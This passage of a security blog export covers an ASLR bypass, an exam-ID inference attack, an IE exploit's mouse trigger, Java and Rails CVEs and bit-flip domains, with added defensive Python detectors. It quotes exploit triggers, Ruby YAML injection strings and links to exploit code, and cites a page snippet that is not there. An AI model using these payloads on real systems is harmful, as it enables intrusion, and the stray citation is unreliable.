In his example, Kingcope utilizes the Windows Media Player control ActiveX object to illustrate how the previously described method of abusing JavaScript's exception handler can be used to load a DLL into predictable address space.<br />
<br />
Now that the selected DLLs (the Windows Media Player DLLs, to continue the example) are loaded at a predictable address, execution of shellcode is only a ROP chain away! I won't spoil the rest of the example Kingcope provided [Hint: <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx">LoadLibrary</a> API], but suffice it to say that it is relatively simple to construct a ROP chain by which to execute arbitrary code following a heap spray.<br />
<br />
Click the link to view a quick graphic summary.<br />
<br />
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5SpuluC-cr18rbdskFF6pVO58zqDpiYYwttByOlSaTvvFiHPpPskAaLql91FO1mDnE6fUFYHLO5-96oWM0oYoluaOqVgAG8GnPO82hb0t_9VzvofK-RBN77R3sYj0KukKjz82FaRaE-6/s1600/ASLRBypass.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5SpuluC-cr18rbdskFF6pVO58zqDpiYYwttByOlSaTvvFiHPpPskAaLql91FO1mDnE6fUFYHLO5-96oWM0oYoluaOqVgAG8GnPO82hb0t_9VzvofK-RBN77R3sYj0KukKjz82FaRaE-6/s1600/ASLRBypass.jpg" title="Quick Graphic Breakdown of Kingcope's Proposal" /></a></div>
<br />
*Perhaps not so much in the case of Java.<br />
**One drawback to this proposed technique is that filling memory in this way will cause Windows to become unresponsive until the selected DLL is loaded and memory is freed by an attacker's JavaScript.</div>
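A defender-side check that follows from the point above about older DLLs whose image bases are not randomized: before trusting ASLR and DEP on a host, audit which loaded modules actually opt in. The Python below is an added example, not code from Kingcope or from this blog. It reads the PE header fields directly (no third-party library), and the minimal header bytes it builds in build_sample_pe are constructed for the demo only; the flag values and offsets are the ones from the PE/COFF specification. The RELOCS_STRIPPED check matters because a module flagged DYNAMIC_BASE but lacking relocation data still cannot be moved by the loader.

```python
import struct

# Flag values from the PE/COFF specification (IMAGE_FILE_* and IMAGE_DLLCHARACTERISTICS_*).
RELOCS_STRIPPED = 0x0001   # COFF Characteristics: no relocation data, image cannot be rebased
HIGH_ENTROPY_VA = 0x0020   # DllCharacteristics: 64-bit image may use the full 64-bit address space
DYNAMIC_BASE = 0x0040      # DllCharacteristics: image opts in to ASLR
NX_COMPAT = 0x0100         # DllCharacteristics: image opts in to DEP


def parse_pe_headers(data: bytes) -> tuple:
    """Return (COFF Characteristics, DllCharacteristics) from an in-memory PE file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # 20-byte COFF file header
    opt_size, coff_chars = struct.unpack_from("<HH", data, coff + 16)
    if opt_size < 72:
        raise ValueError("optional header too short to carry DllCharacteristics")
    opt = coff + 20                           # optional header follows the COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):           # PE32 / PE32+
        raise ValueError("unknown optional header magic %#x" % magic)
    # DllCharacteristics sits at offset 70 in both the PE32 and PE32+ optional headers.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return coff_chars, dll_chars


def mitigation_report(data: bytes) -> dict:
    """Summarise whether the image can really be randomised and whether it is DEP compatible."""
    coff_chars, dll_chars = parse_pe_headers(data)
    relocatable = not (coff_chars & RELOCS_STRIPPED)
    return {
        "aslr": bool(dll_chars & DYNAMIC_BASE) and relocatable,
        "dep": bool(dll_chars & NX_COMPAT),
        "high_entropy": bool(dll_chars & HIGH_ENTROPY_VA),
        "relocatable": relocatable,
    }


def audit_file(path: str) -> dict:
    """Read a DLL or EXE from disk and report its mitigation flags."""
    with open(path, "rb") as fh:
        return mitigation_report(fh.read())


def build_sample_pe(dll_chars: int, coff_chars: int = 0x2102, pe32plus: bool = False) -> bytes:
    """Constructed minimal PE header (not a loadable image) used only for the demo."""
    magic = 0x20B if pe32plus else 0x10B
    opt_size = 112 if pe32plus else 96        # optional header size without data directories
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, coff_chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_chars)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    legacy = build_sample_pe(0)                         # the "older third-party DLL" case
    modern = build_sample_pe(DYNAMIC_BASE | NX_COMPAT)
    print("legacy:", mitigation_report(legacy))
    print("modern:", mitigation_report(modern))
```

Pointing audit_file at the modules a browser has loaded (the ActiveX controls in particular) tells you which of them hand an attacker a fixed image base without any of the heap tricks described above.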
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-62655395708832372882013-01-24T11:34:00.003-08:002013-01-24T11:35:33.626-08:00My GCIA Gold paper was published on sans.org. Also, SANS watermarksI completed my GCIA Gold paper and it was accepted and published this past week. Link below:<br />
<br />
<a href="http://www.sans.org/reading_room/whitepapers/detection/watermarks-prevent-leaks_34087">http://www.sans.org/reading_room/whitepapers/detection/watermarks-prevent-leaks_34087</a><br />
<br />
I wrote it on watermarks and it took me the larger half of the past year to complete. Boy, I really underestimated how difficult it would be. When I read other people's papers I saw a lot of poor grammar and spelling, so I didn't take it very seriously and figured I could just knock it out in a leisurely few months. I couldn't have been more wrong. I spent well over a hundred hours on it, and almost all of the original draft got scrapped. If you're considering a "gold" level paper for any of the GIAC certifications, be aware it isn't going to be easy. But when you get it, it's good resume fodder.<br />
<br />
I picked the topic of the paper due to the watermarks I noticed on the GCIA practice tests I was taking. Below are details about SANS watermarks, simply because they were dropped from the paper. The information was passed along to SANS many months ago so they can act on it if they wanted. None of this could be exploited in a profitable way, but I found it interesting.<br />
<br />
If you look at the monitor at an angle while taking a SANS practice test you can see the watermarks. On further inspection you may notice it's the exact same number as the exam ID. You might also notice that the exam ID numbers you get if you purchase multiple tests are sequential. I collected dozens of numbers from other users and found that this incrementing number is sequential for all users. You could spawn practice "math tests" to ensure the software worked, and those numbers were also sequential from the same autoincrementing field in their database. This indicates an inference attack is possible. <br />
<br />
Now, the purpose of the watermark is almost undoubtedly to trace the source of copyright infringement. The number is unique on a per-test basis, and if the test questions were found on p2p networks with the watermark number carried over, it could be used as evidence against the student that number pointed to. Since SANS testing costs about as much as a used car, they probably care more about piracy than the average cert vendor.<br />
<br />
The problem is that the watermark number is semi-predictable and easily altered. It isn't apparent that your exam ID is sensitive information and could be used against you as evidence, and I didn't realize it myself when I was asking people for theirs. If you wanted to frame someone for piracy, it's as simple as asking them for their practice exam ID.<br />
<br />
Since the IDs are sequential, you could also spawn many math tests and infer someone else's exam ID numbers when they purchase one. Example:<br />
<br />
Exam ID - description<br />
1 - my math test<br />
2 - my math test<br />
3 - my math test<br />
4 - Other person's practice test<br />
5 - Other person's practice test<br />
6 - Other person's exam<br />
7 - my math test<br />
8 - my math test<br />
<br />
On my account I would notice a gap between 4 and 7 in my math test IDs, and I would know that someone purchased a set of three tests (which is how it goes when they buy the full training, afaik) and that #4 and #5 are the practice tests. Then, if I were an awful person, I could insert a "4" watermark and release the test question into the wild. This is a very hit-or-miss way of framing someone, because their practice test is most likely for a different certification than your test question and you can't tell.<br />
<br />
Aside from that, one could also infer purchasing statistics from this autoincrement field. By spawning math tests over time, one could infer how many tests are purchased by observing how many exam IDs were generated by other people. Clusters of 3 are most likely full training purchases, and 1 indicates a single test purchase or a math test. The math test function is rather obscure on their website and I think it's fair to say that it's rarely used. SANS doesn't release any information (afaik) about how many tests or trainings are purchased, only how many students pass. This information isn't very profitable, but it is not public either.<br />
<br />
Now, with all of that said, the real core of this weakness is that they're using their autoincrement field for something important. It's a convenient field to use because you know it'll be unique, and it's always going to be an index and easily searchable. But it will always be vulnerable to inference attacks, and that class of attacks is very hard to protect against because most of the time it isn't obvious what you could discover with that data.<br />
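To make the two halves of that concrete, the inference and the fix, here is an added Python example (mine, not anything from the paper or from SANS). infer_from_gaps reproduces the reasoning from the ID table above over a constructed list of "my" math test IDs, and opaque_exam_id shows the usual remedy: keep the autoincrement as the internal primary key, but expose (and watermark with) an HMAC of it under a server-side secret, so the value stays unique and indexable while neighbouring rows stop producing neighbouring IDs. The secret key is a constructed placeholder.

```python
import hashlib
import hmac


def infer_from_gaps(my_ids):
    """Given the sequential IDs one account was issued, return the runs of IDs
    that went to other people in between, as (first_id, last_id, count) tuples."""
    ids = sorted(set(my_ids))
    runs = []
    for lower, upper in zip(ids, ids[1:]):
        missing = upper - lower - 1
        if missing:
            runs.append((lower + 1, upper - 1, missing))
    return runs


def describe_run(count):
    """Heuristic from the post: a burst of three looks like a full training purchase
    (two practice tests plus the exam); a single ID looks like a lone test."""
    if count == 3:
        return "likely full training purchase (2 practice tests + exam)"
    if count == 1:
        return "single test purchase or math test"
    return "%d tests, mixed purchases" % count


def opaque_exam_id(row_id, secret):
    """Mitigation: derive the visible exam ID from the row ID with an HMAC.
    Still unique per row and still storable/indexable for lookup, but the
    sequence is no longer observable from the outside."""
    mac = hmac.new(secret, str(row_id).encode("ascii"), hashlib.sha256)
    return mac.hexdigest()[:16]


if __name__ == "__main__":
    # Constructed to match the table in the post: my math tests were 1, 2, 3, 7, 8.
    my_math_tests = [1, 2, 3, 7, 8]
    for first, last, count in infer_from_gaps(my_math_tests):
        print("IDs %d-%d went to someone else: %s" % (first, last, describe_run(count)))
    secret = b"constructed-server-secret"   # placeholder, never hard-code a real one
    print("opaque IDs for rows 1-8:", [opaque_exam_id(i, secret) for i in range(1, 9)])
```

Run as-is, the first loop reports IDs 4-6 as someone else's likely training bundle, and the opaque IDs for rows 1 through 8 come out in no recognisable order, which is exactly what the watermark needs.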
<br />
This attack was inspired by an inference attack I found/reported against a video game years ago. The account ID was autoincremented and easily obtainable so I could infer secret data like account age and some overall userbase statistics. In the context of that game it was useful for cheating, so beware of using that field.<br />
<br />
And if you ever plan to do evil stuff with this knowledge, <a href="http://www.youtube.com/watch?v=Zx40udwQvZI" target="_blank">this</a> is all I have to say to you. Spawning tons of math tests on the SANS exam portal will get you noticed.Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-64967783829552266332013-01-16T10:07:00.000-08:002013-01-16T10:12:24.083-08:00JavaScript Anti-Automated Detection<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Yesterday, I came across a relatively rudimentary webpage attempting to exploit a vulnerability in Microsoft Internet Explorer. The particular vulnerability in question is defined in CVE-2012-1875 and is identified by Microsoft in MS12-037. Excellent coverage of this exploit in the wild was posted by AlienVault Labs <a href="http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/">http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/</a><br />
<br />
Though hardly cutting edge now (a fix was issued in June of 2012), I was curious about one of the sections of code. Following the ROP techniques used to bypass Windows Vista (and later) DEP [Data Execution Prevention], there is a section of code, a "trigger", that looks like the following [code follows the break]:<br />
<br />
<br />
<a name='more'></a><br />
<br />
<blockquote class="tr_bq">
<span style="background-color: black;"><span style="color: orange;"><DIV id=testfaild><br /><span class="Apple-tab-span" style="white-space: pre;"> </span><img id="imgTest" style="display:none"><br /><span class="Apple-tab-span" style="white-space: pre;"> </span><a href="javascript:OnTest();" id="MyA" onClick="OnTest();"><br /><span class="Apple-tab-span" style="white-space: pre;"> </span><div style="background-color:#FFFFFF; width:3000; height:4000" id="imgTest" src="" onMouseOver="OnTest2();" onMouseOut="OnTest2();"> </div><br /><span class="Apple-tab-span" style="white-space: pre;"> </span></a><br /><span class="Apple-tab-span" style="white-space: pre;"> </span></DIV></span></span></blockquote>
<br />
Ok, so what is actually going on here? It appears that some user action is required to trigger this exploit. Fortunately for the exploit writers, a user who was redirected to an attack page will probably perform one of the following triggers:<br />
<br />
1) Click their mouse<br />
2) Move their mouse<br />
<br />
Given the div dimensions (3000x4000), the malicious page will detect any of the above triggers anywhere on the screen. This brings me to an interesting point: automated analysis, unless previously scripted, doesn't typically manipulate a mouse (or utilize a GUI in any form). This is a pretty interesting way to dodge automated detection that is based on simply pulling the page (curl or wget). In 2012, the trend of aiming to defeat automated analysis certainly grew in the world of malware. Seeing it in attack pages shouldn't be unexpected.<br />
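One cheap static check a crawler or sandbox can run before giving up on a page that looks inert: find elements whose script only fires on mouse activity and that are sized to blanket the whole viewport. The Python below is an added example of mine, not code from the attack page or from AlienVault; the SAMPLE_PAGE is constructed to mirror the trigger block quoted above, and the 2000-pixel "oversized" threshold is an assumption chosen to exceed any normal viewport.

```python
import re
from html.parser import HTMLParser

MOUSE_HANDLERS = {"onmouseover", "onmouseout", "onmousemove", "onclick",
                  "onmousedown", "onmouseup"}
OVERSIZED_PX = 2000   # assumption: larger than any normal viewport dimension

# Constructed sample, modelled on the trigger block quoted in the post.
SAMPLE_PAGE = """
<html><body>
<DIV id=testfaild>
 <img id="imgTest" style="display:none">
 <a href="javascript:OnTest();" id="MyA" onClick="OnTest();">
 <div style="background-color:#FFFFFF; width:3000; height:4000" id="imgTest" src=""
      onMouseOver="OnTest2();" onMouseOut="OnTest2();"> </div>
 </a>
</DIV>
<p onclick="toggle()" style="width:120px">normal clickable paragraph</p>
</body></html>
"""


def _px(value):
    """Leading integer of a CSS/HTML size value such as '3000' or '120px'."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 0


def _dimensions(attrs):
    """Width/height from explicit attributes, overridden by an inline style declaration."""
    width, height = _px(attrs.get("width")), _px(attrs.get("height"))
    for decl in (attrs.get("style") or "").split(";"):
        prop, _, val = decl.partition(":")
        prop = prop.strip().lower()
        if prop == "width":
            width = _px(val)
        elif prop == "height":
            height = _px(val)
    return width, height


class MouseTriggerScanner(HTMLParser):
    """Collect every element that runs script on a mouse event."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): v for k, v in attrs}
        handlers = sorted(h for h in attrs if h in MOUSE_HANDLERS)
        if not handlers:
            return
        width, height = _dimensions(attrs)
        self.findings.append({
            "tag": tag, "id": attrs.get("id"), "handlers": handlers,
            "width": width, "height": height,
            "oversized": width >= OVERSIZED_PX or height >= OVERSIZED_PX,
        })


def scan(html):
    """All mouse-triggered elements in the page, in document order."""
    scanner = MouseTriggerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def suspicious_elements(html):
    """Mouse-triggered elements that also blanket the page: the combination that
    defeats a fetch-only (curl/wget) or click-free analysis."""
    return [f for f in scan(html) if f["oversized"]]


if __name__ == "__main__":
    for finding in suspicious_elements(SAMPLE_PAGE):
        print(finding)
```

The flagged element is the 3000x4000 div with onMouseOver/onMouseOut; the ordinary 120px clickable paragraph is not. A sandbox that gets a hit from this check should dispatch synthetic mouse events (or drive a real browser) before concluding the page is benign.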
<br />
One thing is for sure: 2013 is going to be interesting.<br />
<br />
<br />
Edit:<br />
Since it's public, the full exploit code can be found here:<br />
<a href="http://pastebin.com/sFqxs4qx">http://pastebin.com/sFqxs4qx</a><br />
<br />
The Metasploit Module (Released June 14, 2012) is available here:<br />
<a href="http://www.exploit-db.com/exploits/19141/">http://www.exploit-db.com/exploits/19141/</a><br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-49939147381855831902013-01-15T19:20:00.000-08:002013-01-15T19:46:22.769-08:00Update on CVE-2013-0422, The Aftermath<div dir="ltr" style="text-align: left;" trbidi="on">
Oracle has officially released Java 7 update 11 which addresses one of two vulnerabilities highlighted in CVE-2013-0422.<br />
<br />
The reflective (invoke) API vulnerability (introduced in Java 7) has been patched, and it has come to light from posts to the Full Disclosure mailing list that this particular vulnerability was introduced due to an earlier, incomplete patch.<br />
Full write up here: <a href="http://lists.grok.org.uk/pipermail/full-disclosure/2013-January/089375.html">More details on Issue 32 and Oracle's 'fix' for it</a><br />
<br />
The initial confounding information released by Immunity Inc, stating that JRE6 could be affected by the "com.sun.jmx.mbeanserver.MBeanInstantiator.findClass" issue, has been refuted by the very same firm after further analysis. This provides third-party substantiation of Oracle's claim that only JDK and JRE 7 update 10 and earlier are affected.<br />
A summary of Immunity Inc's findings:<br />
<blockquote class="tr_bq">
<span style="-webkit-text-size-adjust: none; background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 16px; line-height: 20px;">After further research we found that </span><b style="-webkit-text-size-adjust: none; background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 16px; line-height: 20px;">although the <i>MBeanInstantiator</i> code is the same in both versions, JDK/JRE 6 cannot be exploited.</b></blockquote>
Original analysis [Warning, PDF!]: <a href="https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf">https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf</a><br />
Post Patch Analysis: <a href="http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html?m=1">http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html?m=1</a><br />
<br />
Patching the reflective API vulnerability cuts off the vehicle for exploitation of the MBeanInstantiator.findClass vulnerability. However, Immunity Inc indicates that restricted classes can still be called. This calls into question the overall security of the trusted class model utilized by Java 7. It remains to be seen whether another vehicle for exploitation will be found, and if so, how soon it will be utilized.<br />
<br />
Oracle's official Security Alert can be found here: <a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html">http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html</a><br />
<br />
Two big takeaways here:<br />
1) JDK and JRE 6, 5.0 and 1.4.2, and Java SE Embedded JRE releases are not affected.<br />
2) The MBeanInstantiator.findClass vulnerability is still present, but currently there are no known alternative methods to utilize this bug.</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-60171351209777829962013-01-11T14:02:00.000-08:002013-01-15T19:46:22.771-08:00Off the Rails: A blurb about CVE 2013-0156<div dir="ltr" style="text-align: left;" trbidi="on">
It's been quite a January so far, and we aren't even halfway through!<br />
<br />
Earlier this week (prior to the January 10th, 2013 Java 0day), another major remote code execution vulnerability was disclosed which affects Ruby on Rails implementations 2.x and 3.x.<br />
Summary Here: <a href="http://threatpost.com/en_us/blogs/exploit-code-metasploit-module-out-ruby-rails-flaws-011013">http://threatpost.com</a><br />
<br />
So far, a Metasploit module and PoC exploit code have been released. The SQL injection vulnerability is nicely summarized here:<br />
<span style="background-color: #741b47;">!ruby/object:Arel::Nodes::SqlLiteral </span><br />
<br />
A trio of vulnerabilities exists: JSON, XML [parsing], and remote code execution. For more information see the link here: <a href="http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html">http://ronin-ruby.github.com/blog</a>. The root of these vulnerabilities lies in the way in which Rails parses (user-controlled) YAML input.<br />
<br />
<br />
If you want an in depth break down of the functionality of the RoR vulnerability:<br />
<a href="http://www.insinuator.net/2013/01/rails-yaml/">http://www.insinuator.net/2013/01/rails-yaml/</a><br />
<br />
For a tl;dr:<br />
1. The XML case calls Hash.from_xml(), passing the raw POST body as its argument.<br />
2. The YAML string "--- !ruby/object:A\nfoo: 1\nbar: 1\n" will create an object instance of class A and set the object attributes @foo and @bar to the value 1. This means that an attacker can create instances of all classes defined in the targeted Rails application.<br />
3. ^^ All basic Ruby classes are included, meaning this vulnerability is quite broad.<br />
4. The YAML parser used by Ruby supports the serialization and deserialization of arbitrary data types. This includes Symbols and also arbitrary Objects.<br />
5. SQLi (in the form of the Arel object) is probably only the first of many different ways to exploit this, as it is essentially remote code execution.<br />
6. Validate input. Seriously.<br />
<br />
<b><u>Mitigation</u></b><br />
<b><u><br /></u></b>
Upgrade Rails to one of the following releases: 3.2.11, 3.1.10, 3.0.19 or 2.3.15.</div>
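Until the upgrade lands, the "validate input" advice can be made mechanical at a proxy or in request logging. The Python below is an added example of mine, not code from Rails, Metasploit or the linked write-ups. It flags request bodies that carry Ruby-specific YAML tags (the `!ruby/object:` form shown above) and XML bodies that use a typed element to route text into the YAML loader, which is the XML vector the listed releases disabled. Because YAML double-quoted scalars accept `\uXXXX` escapes, and the Metasploit snippet quoted earlier on this page ends with `yaml.gsub(':', '\u003a')` to rewrite its colons, the detector normalizes those escapes before matching. All sample bodies are constructed, not captured traffic.

```python
import re

# Ruby-specific YAML tags that make the YAML loader instantiate arbitrary classes.
RUBY_TAG = re.compile(
    r"!ruby/(object|hash|struct|exception|regexp|sym|class|module)"
    r"(?::([A-Za-z0-9_:]+))?", re.IGNORECASE)
# XML vector: a typed element that hands its text to the YAML loader or turns it into a Symbol.
TYPED_XML = re.compile(r"""type\s*=\s*[\"'](yaml|symbol)[\"']""", re.IGNORECASE)


def decode_yaml_escapes(text):
    """Resolve \\uXXXX and \\xXX escapes (legal inside YAML double-quoted scalars)
    so that a colon written as \\u003a is seen as a colon by the tag matcher."""
    text = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return text


def find_ruby_tags(body):
    """Sorted, de-duplicated (tag_kind, class_name) pairs found in a request body."""
    found = set()
    for m in RUBY_TAG.finditer(decode_yaml_escapes(body)):
        found.add((m.group(1).lower(), m.group(2)))
    return sorted(found, key=lambda t: (t[0], t[1] or ""))


def classify_request(content_type, body):
    """Verdict for one HTTP request: which tags it carries and whether an XML body
    uses the typed-element trick. Any hit is worth blocking or alerting on."""
    ruby_tags = find_ruby_tags(body)
    yaml_typed_xml = "xml" in content_type.lower() and bool(TYPED_XML.search(body))
    return {
        "ruby_tags": ruby_tags,
        "yaml_typed_xml": yaml_typed_xml,
        "suspicious": bool(ruby_tags) or yaml_typed_xml,
    }


# Constructed sample bodies (not captured traffic).
BENIGN_FORM = "name=alice&age=30"
TYPED_XML_BODY = ('<?xml version="1.0"?><user><name type="yaml">'
                  '--- !ruby/object:Arel::Nodes::SqlLiteral\n</name></user>')
ESCAPED_YAML_BODY = (r"--- !ruby/hash\u003aActionDispatch\u003a\u003aRouting"
                     r"\u003a\u003aRouteSet\u003a\u003aNamedRouteCollection")

if __name__ == "__main__":
    for ctype, body in (("application/x-www-form-urlencoded", BENIGN_FORM),
                        ("application/xml", TYPED_XML_BODY),
                        ("application/x-yaml", ESCAPED_YAML_BODY)):
        print(ctype, classify_request(ctype, body))
```

The detector is a stop-gap, not a substitute for the upgrade: it catches the documented shapes, including the escaped-colon variant, but a patched Rails that never hands user input to the YAML loader is the only real fix.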
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-2104961675211203282013-01-10T09:22:00.003-08:002013-01-15T19:46:22.767-08:00New Java 0-day - 1.7u10<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Following 4 months of relative quiet from the Java front, today marks the appearance of the first 0day since CVE-2012-5088, which was patched by Oracle in October.<br />
<br />
Preliminary reports from multiple vendors indicate this exploit shares some characteristics with CVE-2012-5088, according to Trustwave's SpiderLabs:<br />
<blockquote class="tr_bq">
On top of using java.lang.invoke.MethodHandle.InvokeWithArguments() from CVE-2012-5088, the attacker smartly takes advantage of MBeanInstantiator in order to get a reference to a restricted class from a trusted caller (MBeanInstantiator is trusted). [<a href="http://blog.spiderlabs.com/2013/01/first-java-0day-for-the-year-2013.html">http://blog.spiderlabs.com/2013/01/first-java-0day-for-the-year-2013.html</a>]</blockquote>
AlienVault has released a screenshot of the exploit in action against a fully patched version of Java. Their conclusions mirror those of the preliminary findings from Trustwave: <a href="http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/">http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/</a><br />
<br />
Brian Krebs reports that this exploit has already been included in Paunch's Blackhole and Cool Exploit Kits as well as the Nuclear Exploit Kit. The SANS ISC recommends disabling Java if possible. Fortunately, a feature to disable the browser plugin was conveniently rolled into Java 1.7u10.<br />
<br />
For more information, including ISC's recommendation and primary sources, follow the link here <a href="http://isc.sans.edu/diary/Java+is+still+exploitable+and+is+likely+going+to+remain+so./14899">http://isc.sans.edu/diary/Java+is+still+exploitable+and+is+likely+going+to+remain+so./14899</a><br />
<br />
Update 1: Exploit code has been published here:<a href="http://pastebin.com/raw.php?i=cUG2ayjh"> <span style="white-space: pre-wrap;">http://pastebin.com/raw.php?i=cUG2ayjh</span></a><br />
<br />
Update 2: CVE candidate has been added: CVE-2013-0422. The exploit has also been ported to Metasploit.<br />
<br />
Update 3: Lightly Commented Exploit Code Sample<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUauFLzTqbrybAUJKTHHQcniDyEcVKOxupftDJ5SKDTv9hD3dHAVUIfQ_aFOCPhzdwo7ozZtZIX0FVcrZkT2OyWaFyvV0hk4xj3s3StWtO3xm1Jxr2QHNQQ7qEGPDrcMrWY2u9GZRL7qAk/s1600/image001.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img alt="" border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUauFLzTqbrybAUJKTHHQcniDyEcVKOxupftDJ5SKDTv9hD3dHAVUIfQ_aFOCPhzdwo7ozZtZIX0FVcrZkT2OyWaFyvV0hk4xj3s3StWtO3xm1Jxr2QHNQQ7qEGPDrcMrWY2u9GZRL7qAk/s400/image001.png" title="Commented Exploit Code Sample" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to Embiggen</td></tr>
</tbody></table>
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-31915602716994151292012-12-25T15:41:00.002-08:002012-12-25T15:51:42.192-08:00Python script used to list out all possible bitflipped domainsHere's the script I used about a year ago to generate every bit flip variant of a domain. It enabled me to find this domain and some others. After you generate the list, dump it into Namecheap's bulk domain checker page. It allows you to check up to 50 domains per page load, which is pretty nifty.<br />
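The script itself is at the link below; as an added stand-in that is not the post's own bitflip.py, here is a Python version of the same idea. It assumes the flips are applied to the first label only (the part before the first dot), keeps only candidates that are still valid hostname labels, and drops flips that merely change case since DNS is case-insensitive. chunked() exists only to match the 50-domains-per-page limit mentioned above.

```python
import string

HOSTNAME_CHARS = set(string.ascii_lowercase + string.digits + "-")


def bitflip_variants(domain):
    """Every domain whose first label differs from `domain` by exactly one bit and
    is still a valid hostname label (letters, digits, hyphen; no leading or trailing
    hyphen). Flips into uppercase, '.', or control bytes are discarded."""
    domain = domain.lower()
    label, dot, suffix = domain.partition(".")
    variants = set()
    for i, ch in enumerate(label):
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit))
            if flipped not in HOSTNAME_CHARS:
                continue
            candidate = label[:i] + flipped + label[i + 1:]
            if candidate.startswith("-") or candidate.endswith("-"):
                continue
            variants.add(candidate + dot + suffix)
    return sorted(variants)


def chunked(items, size=50):
    """Split a list into batches; the bulk checker named in the post takes 50 per page load."""
    return [items[i:i + size] for i in range(0, len(items), size)]


if __name__ == "__main__":
    variants = bitflip_variants("microsoft.com")
    print(len(variants), "candidates, e.g.", variants[:5])
    for n, batch in enumerate(chunked(variants), 1):
        print("batch", n, "->", len(batch), "domains")
```

The output for microsoft.com includes micrmsoft.com (the 'o' at index 4 with bit 1 flipped), which is how this blog's own domain fits the pattern; registering the variants defensively is the only way to keep a corrupted lookup from landing on someone else's server.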
<br />
<a href="http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/bitflip.py">http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/bitflip.py</a>Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-42183037350813640842012-12-08T03:36:00.001-08:002012-12-25T15:01:10.455-08:00Our laser maze from the BrainTank conference<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
